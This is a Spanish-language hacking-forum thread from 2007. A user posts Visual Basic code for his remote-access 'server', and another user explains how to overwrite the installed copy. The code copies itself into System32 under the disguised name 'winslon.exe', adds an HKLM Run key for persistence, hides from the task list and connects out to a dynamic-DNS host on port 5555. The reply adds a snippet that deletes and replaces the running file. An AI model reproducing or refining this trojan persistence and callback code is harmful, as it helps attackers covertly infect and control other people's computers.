elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Como reemplazo archivo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Como reemplazo archivo  (Leído 1,912 veces)
shadow.darknesses

Desconectado Desconectado

Mensajes: 73


Ver Perfil
Como reemplazo archivo
« en: 21 Enero 2007, 17:57 pm »

olaa, miren este code es de m server
Código:
On Error Resume Next
Text_chat.Text = "Chat abierto"
ruta = App.Path
If Right(ruta, 1) <> "\" Then ruta = ruta & "\"
ruta = ruta & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ruta, sys & "\winslon.exe"
Set Residencia = CreateObject("WScript.Shell")
Residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winslon", sys & "\winslon.exe"
Ws.RemoteHost = "shadowdarknesses.no-ip.org"
Ws.RemotePort = 5555
SName = "ShaCCorTh"
App.TaskVisible = False
End Sub
ya yo lo abro, todo bien se ejecuta al inicio del pc, pero ya quiero abrir una nueva version de mi sever mas avanzada, NO reemplaza el archivo en system 32, alguien sabe como podria hacerlo para reemplazarlo
gracias
Saludos...


En línea




Cicklow


Desconectado Desconectado

Mensajes: 604


-=Cicklow SOFT®=-


Ver Perfil WWW
Re: Como reemplazo archivo
« Respuesta #1 en: 22 Enero 2007, 22:09 pm »

veamos... si el archivo se esta ejecutando.. no podras reemplazarlo.. eliminalo de memoria antes de reemplazarlo, pero sino es asi prova con:
Código:
sys = LCase(sys)
kill sys & "\winslon.exe"
FileCopy ruta, sys & "\winslon.exe"


En línea

www.cicklow.com . Solo Soy Un Ciego que Ve El Sonido Del Silencio
shadow.darknesses

Desconectado Desconectado

Mensajes: 73


Ver Perfil
Re: Como reemplazo archivo
« Respuesta #2 en: 24 Enero 2007, 06:29 am »

sii xD
no se me habia ocurrido
saludos... y gracias
En línea




Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como hacer un reemplazo doble de caracteres? %Variable:X=Y:1=2%
Scripting
SuperDraco 4 4,648 Último mensaje 26 Marzo 2011, 23:40 pm
por SuperDraco
como copio y reemplazo un archivo dll?
Dudas Generales
kikers10 2 11,429 Último mensaje 5 Abril 2011, 10:31 am
por el-brujo
como copio y reemplazo un archivo dll?
Dudas Generales
elaias 5 36,375 Último mensaje 1 Octubre 2011, 08:25 am
por .:UND3R:.
Zorin OS 15 Lite llega como reemplazo a Windows 7
Noticias
wolfbcn 0 1,668 Último mensaje 22 Noviembre 2019, 01:06 am
por wolfbcn
Si se rompe un ventilador de tu GPU, ¿cómo saber el modelo para su reemplazo?
Noticias
El_Andaluz 0 1,174 Último mensaje 26 Abril 2020, 23:00 pm
por El_Andaluz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines